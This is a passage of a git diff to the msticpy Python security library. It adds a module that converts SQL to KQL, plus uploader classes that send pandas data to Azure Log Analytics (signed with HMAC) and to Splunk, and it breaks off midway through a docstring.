+    def find_query(self, query_name: str) -> Set[Optional[QuerySource]]:
+        """
+        Return set of queries with name `query_name`.
+
+        Parameters
+        ----------
+        query_name: str
+            Name of the query
+
+        Returns
+        -------
+        Set[QuerySource]
+            Set (distinct) queries matching name.
+
+        """
+        return {
+            query_dict.get(query_name)
+            for family, query_dict in self.data_families.items()
+            if query_name in query_dict
+        }
+
+
+def _matches_driver_filter(
+    query_source: QuerySource, filter_spec: Dict[str, Set[str]]
+) -> bool:
+    """Return True if the source metadata matches the filter spec."""
+    match = True
+    for item_name, filter_value in filter_spec.items():
+        if not filter_value:
+            continue
+        source_name = "data_source" if item_name == "data_sources" else item_name
+        source_val = query_source.metadata.get(source_name)
+        if isinstance(source_val, list):
+            match &= bool(filter_value & set(source_val))
+        else:
+            match &= bool(filter_value & {source_val})
+        if not match:
+            break
+    return match
diff --git a/msticpy/data/sql_to_kql.py b/msticpy/data/sql_to_kql.py
new file mode 100644
index 000000000..995436ce6
--- /dev/null
+++ b/msticpy/data/sql_to_kql.py
@@ -0,0 +1,603 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Module for SQL to KQL Conversion.
+
+This is an experiment conversion utility built to support a limited subset
+of ANSI SQL.
+It relies on moz_sql_parser (https://github.com/mozilla/moz-sql-parser)
+to parse the SQL syntax tree. Some hacky additions have been done to
+allow table renaming and support for a few SparkSQL operators such as
+RLIKE.
+
+For a more complete translation help with SQL to KQL see
+https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/sqlcheatsheet
+
+Known limitations
+-----------------
+
+- Does not support aggregate functions in SELECT with no GROUP BY clause
+- Does not support IN, EXISTS, HAVING operators
+- Only partial support for AS naming (should work in SELECT expressions)
+
+"""
+import random
+import re
+from typing import List, Tuple, Any, Union, Dict, Optional
+
+from ..common.exceptions import MsticpyImportExtraError
+
+try:
+    import moz_sql_parser
+    from moz_sql_parser import parse
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without moz_sql_parser installed",
+        title="Error importing moz_sql_parser for sql_to_kql",
+        extra="sql",
+    ) from imp_err
+
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_DEBUG = False
+
+SPARK_KQL_FUNC_MAP = {
+    "avg": ("avg", None, None),
+    "base64": ("base64_encode_tostring", None, None),
+    "concat": ("strcat", None, None),
+    "count": ("count", None, None),
+    "if": ("iif", None, None),
+    "iif": ("iif", None, None),
+    "ifnull": (None, None, "iif(isnull({p0}), {p1}, {p0}))"),
+    "in": ("in", None, None),
+    "instr": ("indexof", None, None),
+    "int": ("toint", None, None),
+    "isnotnull": ("isnotnull", None, None),
+    "isnull": ("isnull", None, None),
+    "left": ("NA", None, None),
+    "length": ("strlen", None, None),
+    "like": ("NA", None, None),
+    "locate": ("indexof", None, None),
+    "lower": ("tolower", None, None),
+    "lcase": ("tolower", None, None),
+    "ltrim": ("trim_start", None, None),
+    "max": ("max", None, None),
+    "mean": ("mean", None, None),
+    "min": ("min", None, None),
+    "position": ("indexof", None, None),
+    "regexp_extract": ("extract", "{p1}, {p0}", None),  # swap params 0, 1
+    "replace": ("replace", None, None),
+    "reverse": ("reverse", None, None),
+    "rtrim": ("trim_end", None, None),
+    "split": ("split", None, None),
+    "string": ("tostring", None, None),
+    "str": ("tostring", None, None),
+    "substr": ("substring", None, None),
+    "substring": ("substring", None, None),
+    "sum": ("sum", None, None),
+    "todatetime": ("to_date", None, None),
+    "translate": ("translate", None, None),
+    "trim": ("trim", None, None),
+    "unbase64": ("base64_decode_tostring", None, None),
+    "upper": ("toupper", None, None),
+}
+
+
+AND = "and"
+AS = "as"
+ASC = "asc"
+BETWEEN = "between"
+CASE = "case"
+COLLATE_NOCASE = "collate nocase"
+CROSS_JOIN = "cross join"
+DESC = "desc"
+DISTINCT = "distinct"
+ELSE = "else"
+END = "end"
+FROM = "from"
+FULL_JOIN = "full join"
+FULL_OUTER_JOIN = "full outer join"
+GROUP_BY = "groupby"
+HAVING = "having"
+IN = "in"
+INNER_JOIN = "inner join"
+IS = "is"
+IS_NOT = "is not"
+JOIN = "join"
+LEFT_JOIN = "left join"
+LEFT_OUTER_JOIN = "left outer join"
+LIKE = "like"
+LIMIT = "limit"
+NOT = "not"
+NOT_BETWEEN = "not between"
+NOT_IN = "not in"
+NOT_LIKE = "not like"
+OFFSET = "offset"
+ON = "on"
+OR = "or"
+ORDER_BY = "orderby"
+RIGHT_JOIN = "right join"
+RIGHT_OUTER_JOIN = "right outer join"
+SELECT = "select"
+THEN = "then"
+UNION = "union"
+UNION_ALL = "union all"
+USING = "using"
+WHEN = "when"
+WHERE = "where"
+WITH = "with"
+
+# override/add keywords
+RLIKE = "rlike"
+
+
+JOIN_KEYWORDS = {
+    FULL_JOIN: "outer",
+    FULL_OUTER_JOIN: "outer",
+    INNER_JOIN: "inner",
+    JOIN: "inner",
+    LEFT_JOIN: "left",
+    LEFT_OUTER_JOIN: "left",
+    RIGHT_JOIN: "right",
+    RIGHT_OUTER_JOIN: "right",
+    CROSS_JOIN: "CROSS_JOIN_TODO",
+}
+JOIN_KEYWORDS = {kw.replace("_", " "): kql for kw, kql in JOIN_KEYWORDS.items()}
+
+
+BINARY_OPS = {val: key for key, val in moz_sql_parser.keywords.binary_ops.items()}
+BINARY_OPS["eq"] = "=="
+BINARY_OPS["neq"] = "!="
+BINARY_OPS["nin"] = "!in"
+BINARY_OPS["rlike"] = "not matches regex"
+BINARY_OPS["nlike"] = "not matches regex"
+BINARY_OPS["concat"] = "+"
+BINARY_OPS["is"] = "=="
+BINARY_OPS["is not"] = "!="
+
+
+REMAPPED_KEYWORDS = {"RLIKE": "LIKE"}
+
+
+# noqa: MC0001
+
+
+def sql_to_kql(sql: str, target_tables: Dict[str, str] = None) -> str:
+    """Parse SQL and return KQL equivalent."""
+    # ensure literals are surrounded by single quotes
+    sql = _single_quote_strings(sql)
+
+    # replace table names
+    if target_tables:
+        for table in target_tables:
+            sql = sql.replace(table, target_tables[table])
+    # replace keywords
+    sql = _remap_kewords(sql)
+    parsed_sql = parse(sql)
+    query_lines = _parse_query(parsed_sql)
+    return "\n".join(line for line in query_lines if line.strip())
+
+
+def _parse_query(parsed_sql: Dict[str, Any]) -> List[str]:  # noqa: MC0001
+    """Translate query or subquery."""
+    query_lines: List[str] = []
+    if isinstance(parsed_sql, str):
+        return [parsed_sql]
+    if FROM in parsed_sql:
+        _process_from(parsed_sql[FROM], query_lines)
+    if WHERE in parsed_sql:
+        query_lines.append(f"| where {_parse_expression(parsed_sql[WHERE])}")
+
+    if GROUP_BY in parsed_sql:
+        _process_group_by(parsed_sql, query_lines)
+        # Get rid of the SELECT statement since we've processed it in
+        # the groupby
+        parsed_sql.pop(SELECT)
+
+    distinct_select: List[Dict[str, Any]] = []
+    if SELECT in parsed_sql:
+        distinct_select, expr_list = _is_distinct(parsed_sql[SELECT])
+        _process_select(parsed_sql[SELECT], expr_list, query_lines)
+    if ORDER_BY in parsed_sql:
+        query_lines.append(f"| order by {_create_order_by(parsed_sql[ORDER_BY])}")
+    if distinct_select:
+        query_lines.append(
+            f"| distinct {', '.join(_create_distinct_list(distinct_select))}"
+        )
+    if LIMIT in parsed_sql:
+        query_lines.append(f"| limit {parsed_sql[LIMIT]}")
+    if UNION in parsed_sql:
+        union_subquery = {UNION_ALL: parsed_sql[UNION]}
+        query_lines.extend(_parse_query(union_subquery))
+        query_lines.append("| distinct *")
+    if UNION_ALL in parsed_sql:
+        union_l_expr = "\n".join(_parse_query(parsed_sql[UNION_ALL][0]))
+        query_lines.append(union_l_expr)
+        union_r_expr = "\n  ".join(_parse_query(parsed_sql[UNION_ALL][1]))
+        query_lines.append(f"| union ({union_r_expr}\n)")
+
+    return query_lines
+
+
+def _process_from(
+    from_expr: Union[List[Dict[str, Any]], Dict[str, Any], str], query_lines: List[str]
+):
+    """Process FROM clause."""
+    if isinstance(from_expr, dict) and UNION in from_expr:
+        query_lines.extend(_parse_query(from_expr))
+    elif isinstance(from_expr, dict):
+        query_lines.extend(_parse_query(from_expr["value"]))
+    elif isinstance(from_expr, str):
+        query_lines.append((from_expr))
+        return
+    elif isinstance(from_expr, list):
+        for from_item in from_expr:
+            if isinstance(from_item, str):
+                query_lines.append((from_item))
+            elif isinstance(from_item, dict) and "value" in from_item:
+                query_lines.extend(_parse_query(from_item.get("value")))  # type: ignore
+
+    join_expr = from_expr if isinstance(from_expr, list) else [from_expr]
+    join_list = _get_join_list(join_expr)
+    for join_item in join_list:
+        join_line = _parse_join(join_item)
+        if join_line:
+            query_lines.append(join_line)
+
+
+def _process_select(
+    parsed_sql: Dict[str, Any],
+    expr_list: Union[List[Dict[Any, Any]], Dict[Any, Any]],
+    query_lines: List[str],
+):
+    """Process SELECT clause."""
+    # Expressions
+    if parsed_sql == "*":
+        return
+    _db_print(expr_list, type(expr_list))
+    select_list = expr_list if isinstance(expr_list, list) else [expr_list]
+    select_list = _get_expr_list(select_list)
+    project_items = []
+    extend_items = []
+    for item in select_list:
+        value = _parse_expression(item["value"])
+        name = item.get("name")
+        if value != item["value"]:
+            # if this isn't a simple rename - add to extend
+            name = name or _gen_expr_name(item["value"])
+            extend_items.append(f"{name} = {value}")
+            project_items.append(name)
+        else:
+            if name:
+                project_items.append(f"{name} = {value}")
+            else:
+                project_items.append(value)
+    if extend_items:
+        query_lines.append(f"| extend {', '.join(extend_items)}")
+    if project_items:
+        query_lines.append(f"| project {', '.join(project_items)}")
+
+
+def _gen_expr_name(value):
+    """Generate random expression name."""
+    pref = "expr"
+    if isinstance(value, str):
+        return value
+    if isinstance(value, dict):
+        first_val = next(iter(value.values()))
+        if isinstance(first_val, str):
+            return first_val
+        # prob a function so base the name on that
+        pref = next(iter(value.keys()))
+    # otherwise just generate a rand value as suffix
+    suffix = str(random.randint(1000, 9999))  # nosec
+    return f"{pref}_{suffix}"
+
+
+def _get_expr_list(expr_list):
+    if (
+        isinstance(expr_list, list)
+        and len(expr_list) == 1
+        and isinstance(expr_list[0], dict)
+        and isinstance(expr_list[0].get("value"), list)
+    ):
+        return expr_list[0]["value"]
+    return expr_list
+
+
+def _get_expr_value(expr_val):
+    if isinstance(expr_val, dict) and "value" in expr_val:
+        return expr_val["value"]
+    if isinstance(expr_val, list):
+        return _get_expr_list(expr_val)
+    return expr_val
+
+
+def _process_group_by(parsed_sql: Dict[str, Any], query_lines: List[str]):
+    """Process GROUP BY clause."""
+    group_by_expr = parsed_sql[GROUP_BY]
+    group_by_expr = (
+        group_by_expr if isinstance(group_by_expr, list) else [group_by_expr]
+    )
+    by_clause = ", ".join(val["value"] for val in group_by_expr if val.get("value"))
+
+    _, expr_list = _is_distinct(parsed_sql[SELECT])
+    group_by_expr_list = []
+    expr_list = _get_expr_value(expr_list)
+    for expr in expr_list:
+        name_expr = ""
+        if "name" in expr:
+            name_expr = f"{expr.get('name')} = "
+        if isinstance(expr.get("value"), str):
+            group_by_expr_list.append(f"{name_expr}any({expr['value']})")
+        else:
+            group_by_expr_list.append(
+                f"{name_expr}{_parse_expression(expr.get('value'))}"
+            )
+    query_lines.append(f"| summarize {', '.join(group_by_expr_list)} by {by_clause}")
+
+
+# pylint: disable=too-many-return-statements, too-many-branches
+def _parse_expression(expression):  # noqa: MC0001
+    """Return parsed expression."""
+    if _is_literal(expression)[0]:
+        return _quote_literal(expression)
+    if not isinstance(expression, dict):
+        return expression
+    if AND in expression:
+        return "\n  and ".join([_parse_expression(expr) for expr in expression[AND]])
+    if OR in expression:
+        return "\n  or ".join([_parse_expression(expr) for expr in expression[OR]])
+    if NOT in expression:
+        return f" not ({_parse_expression(expression[NOT])})"
+    if BETWEEN in expression:
+        args = expression[BETWEEN]
+        betw_expr = f"{_parse_expression(args[1])} .. {_parse_expression(args[2])}"
+        return f"{args[0]} between ({betw_expr})"
+    if NOT_BETWEEN in expression:
+        args = expression[NOT_BETWEEN]
+        betw_expr = f"{_parse_expression(args[1])} .. {_parse_expression(args[2])}"
+        return f"{args[0]} not between ({betw_expr})"
+    if IN in expression or NOT_IN in expression:
+        sql_op = IN if IN in expression else NOT_IN
+        kql_op = IN if IN in expression else "!in"
+        args = expression[sql_op]
+
+        right = _quote_literal(args[1])
+        if isinstance(right, list):
+            _db_print(args[1])
+            arg_list = ", ".join([str(_parse_expression(l_item)) for l_item in right])
+            return f"{args[0]} {kql_op} ({arg_list})"
+        sub_query = "\n".join(_parse_query(right))
+        return f"{args[0]} {kql_op} ({sub_query})"
+
+    # Handle other operators
+    oper = list(expression.keys())[0] if expression else None
+    if oper in BINARY_OPS:
+        right = _parse_expression(expression[oper][1])
+        left = _parse_expression(expression[oper][0])
+        return f"{left} {BINARY_OPS[oper]} {right}"
+    if LIKE in expression:
+        return _process_like(expression)
+
+    # For everything else, assume it's a function
+    if expression:
+        func, operand = next(iter(expression.items()))
+        #         set_trace()
+        return _map_func(func, operand)
+    return "EXPRESSION {expression} not resolved."
+
+
+# pylint: enable=too-many-return-statements, too-many-branches
+
+
+def _map_func(func: str, *args) -> str:
+    """Return KQL function for SQL function."""
+    func = func.lower().strip()
+    args_dict = {f"p{idx}": arg for idx, arg in enumerate(args)}
+    def_arg_fmt = ", ".join(f"{{{arg}}}" for arg in args_dict)
+    if func not in SPARK_KQL_FUNC_MAP:
+        func_fmt = f"{func}({def_arg_fmt}) // WARNING unmapped function\n"
+        return func_fmt.format(**args_dict)
+    func_map = SPARK_KQL_FUNC_MAP[func]
+
+    if (
+        func == "count"
+        and isinstance(args[0], dict)
+        and next(iter(args[0])) == "distinct"
+    ):
+        func_arg = _get_expr_value(args[0]["distinct"])
+        return f"dcount({func_arg})"
+
+    if not func_map[1] and not func_map[2]:
+        func_fmt = f"{func_map[0]}({def_arg_fmt})"
+        return func_fmt.format(**args_dict)
+    if func_map[1]:
+        func_fmt = f"{func_map[0]}({func_map[1]})"
+        return func_fmt.format(**args_dict)
+    if func_map[2]:
+        func_fmt = f"{func_map[2]}"
+        return func_fmt.format(**args_dict)
+    raise ValueError(f"Could not map function or args {func}{args_dict}")
+
+
+def _quote_literal(expr: Union[str, List[str], Any]) -> Any:
+    """Quote string if it is a literal."""
+    literal, expr = _is_literal(expr)
+    if not literal:
+        return expr
+    if isinstance(expr, str):
+        return _quote(expr)
+    if isinstance(expr, list):
+        return [_quote(memb) for memb in expr]
+    return expr
+
+
+def _is_literal(expr: Union[Dict[str, Any], Any]) -> Tuple[bool, Any]:
+    """Check if literal string."""
+    if isinstance(expr, dict) and "literal" in expr:
+        return True, expr["literal"]
+    return False, expr
+
+
+def _quote(expr: str) -> str:
+    """Quote a string, if not already quoted."""
+    if expr.startswith("'") and expr.endswith("'"):
+        return expr
+    return f"'{expr}'"
+
+
+def _single_quote_strings(sql: str) -> str:
+    """Replace unquoted double-quotes with single-quotes."""
+    return re.sub(r"(?<![\\])\"", "'", sql)
+
+
+def _remap_kewords(sql: str) -> str:
+    """Replace keywords in source SQL statement."""
+    for repl_kw, mapped_kw in REMAPPED_KEYWORDS.items():
+        sql = re.sub(f"\\s{repl_kw}\\s", f" {mapped_kw} ", sql)
+    return sql
+
+
+def _is_distinct(
+    select_list: Union[Dict[str, Any], List[Dict[str, Any]]]
+) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]]]:
+    """Check for DISTINCT in SELECT clause."""
+    select_list_out = []
+    dist_list: List[Dict[str, Any]] = []
+    dist_dict = _get_expr_value(select_list)
+
+    if isinstance(dist_dict, dict) and DISTINCT in dist_dict:
+        dist_list = dist_dict.pop(DISTINCT)
+        # Keep distinct items in the select list
+        return dist_list, dist_list
+
+    if isinstance(select_list, dict):
+        select_list = [select_list]
+    if isinstance(select_list, list):
+        for expr in select_list:
+            _db_print(expr)
+            if "value" in expr and DISTINCT in expr["value"]:
+                dist_list.append({"value": _get_expr_value(expr["value"][DISTINCT])})
+            select_list_out.append(expr)
+    return dist_list, select_list_out
+
+
+def _format_order_item(item: Dict[str, Any]) -> str:
+    """Return ORDER BY item with sort direction."""
+    if "sort" in item:
+        return f"{item['value']} {item['sort'].lower()}"
+    return f"{item['value']}"
+
+
+def _get_join_list(parsed_sql: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
+    """Return list of JOIN sub-expressions."""
+    if not isinstance(parsed_sql, list):
+        return []
+    join_list = []
+    for from_source in parsed_sql:
+        if not isinstance(from_source, dict):
+            continue
+        join = JOIN_KEYWORDS & from_source.keys()
+        if join:
+            join_list.append(from_source)
+    return join_list
+
+
+def _rewrite_table_refs(join_expr: Union[Any, str, List], table_expr: str) -> str:
+    """Rewrite dotted prefixes."""
+    p_expr = _parse_expression(join_expr)
+    prefixes = set(re.findall(r"(\w+)\.", p_expr))
+    if not prefixes:
+        return p_expr
+    if f"{table_expr}" in prefixes:
+        p_expr = p_expr.replace(f"{table_expr}.", "$right.")
+        prefixes.remove(f"{table_expr}")
+    for prefix in prefixes:
+        p_expr = p_expr.replace(
+            f"{prefix}.",
+            "$right." if prefix.casefold() == table_expr.casefold() else "$left.",
+        )
+    return p_expr
+
+
+def _parse_join(join_expr) -> Optional[str]:
+    """Return translated JOIN expression."""
+    join_type_set = JOIN_KEYWORDS & join_expr.keys()
+    if not join_type_set:
+        return None
+    join_type = join_type_set.pop()
+    table_expr = join_expr[join_type]
+    kql_join_type = JOIN_KEYWORDS[join_type]
+    if "value" in table_expr and "select" in table_expr["value"]:
+        table_expr = table_expr["value"]
+
+    p_table_expr = "\n  ".join(_parse_query(table_expr))
+    if "name" in join_expr[join_type]:
+        table_name = join_expr[join_type]["name"]
+    else:
+        table_name = p_table_expr.split(" ", maxsplit=1)[0].strip()
+    on_expr = _parse_expression(join_expr["on"])
+    on_expr = _rewrite_table_refs(on_expr, table_name)
+    _db_print(table_expr, kql_join_type, p_table_expr)
+
+    return f"| join kind={kql_join_type} ({p_table_expr}) on {on_expr}"
+
+
+def _process_like(expression: Dict[str, Any]) -> str:
+    """Process Like clause."""
+    left = _parse_expression((expression[LIKE][0]))
+    literal, right = _is_literal(expression[LIKE][1])
+    if not (literal and isinstance(right, str)):
+        raise ValueError(
+            f"Right side operand {right} isn't usable in LIKE expression",
+            f"{left} LIKE {right}",
+        )
+    if re.match("^[^%_]+[%_]$", right):
+        oper = "startswith"
+        right = right.replace("%", "").replace("_", "")
+    elif re.match("^[%_][^%_]+$", right):
+        oper = "endswith"
+        right = right.replace("%", "").replace("_", "")
+    elif re.match("^[%_][^%_]+[%_]$", right):
+        oper = "contains"
+        right = right.replace("%", "").replace("_", "")
+    else:
+        oper = "matches regex"
+        right = right.replace("_", ".").replace("%", ".*")
+    right = _quote(right)
+    return f"{left} {oper} {right}"
+
+
+def _create_distinct_list(distinct_select):
+    distinct_list = []
+    for distinct_item in distinct_select:
+        if "name" in distinct_item:
+            distinct_list.append(distinct_item["name"])
+        else:
+            val = _parse_expression(_get_expr_value(distinct_item))
+            if val != distinct_item.get("value"):
+                # If value was a complex expression we can't use
+                # it directly so just revert to distinct *
+                distinct_list = ["*"]
+                break
+            distinct_list.append(val)
+    return distinct_list
+
+
+def _create_order_by(order_by):
+    if isinstance(order_by, list):
+        return ", ".join(_format_order_item(item) for item in order_by)
+    return _format_order_item(order_by)
+
+
+def _db_print(*args, **kwargs):
+    if _DEBUG:
+        print(*args, **kwargs)
diff --git a/msticpy/data/uploaders/__init__.py b/msticpy/data/uploaders/__init__.py
new file mode 100644
index 000000000..68d82ea36
--- /dev/null
+++ b/msticpy/data/uploaders/__init__.py
@@ -0,0 +1,18 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data uploader sub-package."""
+# flake8: noqa: F403
+from .uploader_base import UploaderBase
+
+try:
+    from .loganalytics_uploader import LAUploader
+    from .splunk_uploader import SplunkUploader
+except ImportError:
+    pass
+
+from ..._version import VERSION
+
+__version__ = VERSION
diff --git a/msticpy/data/uploaders/loganalytics_uploader.py b/msticpy/data/uploaders/loganalytics_uploader.py
new file mode 100644
index 000000000..b8deab8a6
--- /dev/null
+++ b/msticpy/data/uploaders/loganalytics_uploader.py
@@ -0,0 +1,226 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""LogAnayltics Uploader class."""
+from typing import Any
+import json
+import datetime
+import sys
+import hashlib
+import hmac
+import base64
+import re
+from pathlib import Path
+
+import httpx
+from tqdm.notebook import tqdm
+import pandas as pd
+
+from ...common.exceptions import MsticpyConnectionError
+
+from .uploader_base import UploaderBase
+from ..._version import VERSION
+
+# Credits
+# https://docs.microsoft.com/en-us/azure/azure-monitor/platform/data-collector-api#python-3-sample
+# https://github.com/Cyb3rWard0g/azure-loganalytics-api-clients/blob/master/python/ala-python-data-producer.py
+
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class LAUploader(UploaderBase):
+    """Uploader class for LogAnalytics."""
+
+    def __init__(self, workspace: str, workspace_secret: str, **kwargs):
+        """Initialize a LogAnalytics Uploader instance."""
+        super().__init__()
+        self._kwargs = kwargs
+        self.workspace = workspace
+        self.workspace_secret = workspace_secret
+        self._debug = kwargs.get("debug", False)
+        self.ops_loc = kwargs.get("opsinsight_loc", ".ods.opinsights.azure.com")
+
+    def _build_signature(
+        self,
+        date: str,
+        content_length: int,
+        method: str,
+        content_type: str,
+        resource: str,
+    ) -> str:
+        """
+        Build authentication authentication string to pass to LA API.
+
+        Parameters
+        ----------
+        date : str
+            datetime of authencation session.
+        content_length : int
+            lenght of content to be passed to the api.
+        method : str
+            HTTP method being used.
+        content_type : str
+            Type of content being passed to the API.
+        resource : str
+            The API endpoint being targetted.
+
+        Returns
+        -------
+        str
+            The encoded authorization string.
+
+        """
+        x_headers = "x-ms-date:" + date
+        string_to_hash = "\n".join(
+            [method, str(content_length), content_type, x_headers, resource]
+        )
+        bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
+        decoded_key = base64.b64decode(self.workspace_secret)
+        encoded_hash = base64.b64encode(
+            hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()
+        ).decode()
+        authorization = f"SharedKey {self.workspace}:{encoded_hash}"
+        return authorization
+
+    def _post_data(self, body: str, table_name: str):
+        """
+        Write data to Log Analytics Workspace.
+
+        Parameters
+        ----------
+        body : str
+            The JSON formatted data to write to Log Analytics.
+        table_name : str
+            The name of the custom table to write the data to.
+
+        Raises
+        ------
+        MsticpyConnectionError
+            Raised when response code indicates failure.
+
+        """
+        table_name = re.sub("[^A-Za-z0-9_]+", "", table_name)
+
+        resource = "/api/logs"
+        content_type = "application/json"
+        rfc1123date = datetime.datetime.utcnow().strftime("%a, %d %b %Y %H:%M:%S GMT")
+        content_length = len(body)
+        signature = self._build_signature(
+            rfc1123date, content_length, "POST", content_type, resource
+        )
+        uri = (
+            "https://"
+            + self.workspace
+            + self.ops_loc
+            + resource
+            + "?api-version=2016-04-01"
+        )
+        headers = {
+            "content-type": content_type,
+            "Authorization": signature,
+            "Log-Type": table_name,
+            "x-ms-date": rfc1123date,
+        }
+        try:
+            response = httpx.post(uri, content=body, headers=headers)
+        except httpx.ConnectError as req_err:
+            raise MsticpyConnectionError(
+                "Unable to connect to workspace, ensure your Workspace ID is correct.",
+                title="Unable to connect to Workspace",
+            ) from req_err
+        if self._debug is True:
+            print(f"Upload response code: {response.status_code}")
+        if response.status_code < 200 or response.status_code > 299:
+            raise MsticpyConnectionError(
+                f"""LogAnalytics data upload failed with code {response.status_code}.
+                Check Workspace ID and key""",
+                title="Data Upload Failed",
+            )
+
+    def upload_df(self, data: pd.DataFrame, table_name: Any, **kwargs):
+        """
+        Upload a pandas DataFrame to Log Analytics.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            Pandas DataFrame to upload.
+        table_name : str
+            Custom table name to upload the data to.
+
+        """
+        events = []
+        for row in data.iterrows():
+            events.append(row[1].astype(str).to_dict())
+            # Due to 30MB limit if data is larger than 25Mb upload that chunk then continue
+            if sys.getsizeof(json.dumps(events)) > 26214400:
+                if self._debug is True:
+                    print("Data larger than 25MB spliting data requests.")
+                body = json.dumps(events)
+                self._post_data(body, table_name)
+                events = []
+
+        if events:
+            body = json.dumps(events)
+            self._post_data(body, table_name)
+
+        if self._debug:
+            print(f"Upload to {table_name} complete")
+
+    def upload_file(
+        self, file_path: str, table_name: str = None, delim: str = ",", **kwargs
+    ):
+        """
+        Upload a seperated value file to Log Analytics.
+
+        Parameters
+        ----------
+        file_path : str
+            Path to file to upload.
+        table_name : str
+            Table name to upload data to.
+        delim : str, optional
+            Value seperator used by the file, by default ","
+
+        """
+        path = Path(file_path)
+        data = pd.read_csv(path, delimiter=delim)
+        if not table_name:
+            table_name = path.stem
+        self.upload_df(data, table_name)
+
+    def upload_folder(
+        self, folder_path: str, table_name: str = None, delim: str = ",", **kwargs
+    ):
+        """
+        Upload all files in a folder to Log Analytics.
+
+        Parameters
+        ----------
+        folder_path : str
+            Folder path to upload.
+        table_name : str, optional
+            Table name to upload all files to, by default None.
+        delim : str, optional
+            Sperator used in files in target folder, by default ",".
+
+        """
+        glob_pat = kwargs.get("glob", "*")
+        ext = glob_pat
+        t_name = bool(table_name)
+        input_files = Path(folder_path).glob(ext)
+        # pylint: disable=unnecessary-comprehension
+        input_files = [path for path in input_files]  # type: ignore
+        # pylint: enable=unnecessary-comprehension
+        progress = tqdm(total=len(list(input_files)), desc="Files", position=0)
+        for path in input_files:
+            data = pd.read_csv(path, delimiter=delim)
+            if t_name is False:
+                table_name = path.stem
+            self.upload_df(data, table_name)
+            progress.update(1)
+        progress.close()
diff --git a/msticpy/data/uploaders/splunk_uploader.py b/msticpy/data/uploaders/splunk_uploader.py
new file mode 100644
index 000000000..127381c7d
--- /dev/null
+++ b/msticpy/data/uploaders/splunk_uploader.py
@@ -0,0 +1,254 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Splunk Uploader class."""
+from pathlib import Path
+from typing import Any
+from tqdm.notebook import tqdm
+import pandas as pd
+from pandas.errors import ParserError
+
+from .uploader_base import UploaderBase
+from ..._version import VERSION
+from ..drivers.splunk_driver import SplunkDriver
+from ...common.exceptions import MsticpyConnectionError, MsticpyUserError
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class SplunkUploader(UploaderBase):
+    """Uploader class for Splunk."""
+
+    def __init__(self, username: str, host: str, password: str, **kwargs):
+        """Initialize a Splunk Uploader instance."""
+        super().__init__()
+        self._kwargs = kwargs
+        self.workspace = host
+        self.workspace_secret = password
+        self.user = username
+        self.driver = SplunkDriver()
+        self.port = kwargs.get("port", 8089)
+        self._debug = kwargs.get("debug", False)
+        self._connect = kwargs.get("connect", True)
+        self.connected = False
+        if self._connect:
+            self.connect()
+
+    def connect(self):
+        """Connect to Splunk host."""
+        self.driver.connect(
+            host=self.workspace,
+            username=self.user,
+            password=self.workspace_secret,
+            port=self.port,
+        )
+        self.connected = True
+
+    def _post_data(
+        self,
+        data: pd.DataFrame,
+        index_name: str,
+        table_name: Any,
+        host: str = None,
+        **kwargs,
+    ):
+        """
+        Write data to the Splunk instance connected to.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            Data to upload.
+        index_name : str
+            Name of the Splunk Index to add data to.
+        table_name : str
+            The souretype in Splunk data will be uploaded to.
+        host : str, optional
+            The hostname associated with the uploaded data, by default "Upload".
+
+        """
+        if not self.connected:
+            raise MsticpyConnectionError(
+                "Splunk host not connected, please call .connect before proceding.",
+                title="Splunk host not connected",
+            )
+        if not host:
+            host = "Upload"
+        create_idx = kwargs.get("create_index", False)
+        index = self._load_index(index_name, create_idx)
+        progress = tqdm(total=len(data.index), desc="Rows", position=0)
+        for row in data.iterrows():
+            data = row[1].to_csv()
+            try:
+                data.encode(encoding="latin-1")
+            except UnicodeEncodeError:
+                data = data.encode(encoding="utf-8")
+            index.submit(data, sourcetype=table_name, host=host)
+            progress.update(1)
+        progress.close()
+        if self._debug is True:
+            print("Upload complete")
+
+    # pylint: disable=arguments-differ
+    def upload_df(  # type: ignore
+        self,
+        data: pd.DataFrame,
+        table_name: str,
+        index_name: str,
+        create_index: bool = False,
+        **kwargs,
+    ):
+        """
+        Upload a Pandas DataFrame to Splunk.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            Data to upload.
+        table_name : str
+            The souretype in Splunk data will be uploaded to.
+        index_name : str
+            Name of the Splunk Index to add data to.
+        host : str, optional
+            Host name to upload data with, default will be 'Upload'
+        create_index : bool, optional
+            Set this to true to create the index if it doesn't already exist. Default is False.
+
+        """
+        host = kwargs.get("host", None)
+        if not isinstance(data, pd.DataFrame):
+            raise MsticpyUserError(
+                "Data must be in Pandas DataFrame format.",
+                title="incorrect data format",
+            )
+        self._post_data(
+            data=data,
+            table_name=table_name,
+            index_name=index_name,
+            create_index=create_index,
+            host=host,
+        )
+
+    def upload_file(  # type: ignore
+        self,
+        file_path: str,
+        index_name: str,
+        table_name: str = None,
+        delim: str = ",",
+        create_index=False,
+        **kwargs,
+    ):
+        """
+        Upload a seperated value file to Splunk.
+
+        Parameters
+        ----------
+        file_path : str
+            Path to the file to upload.
+        index_name : str
+            Name of the Splunk Index to add data to.
+        table_name : str, optional
+            The souretype in Splunk data will be uploaded to, if not set the file name will be used.
+        delim : str, optional
+            Seperator value in file, by default ","
+        host : str, optional
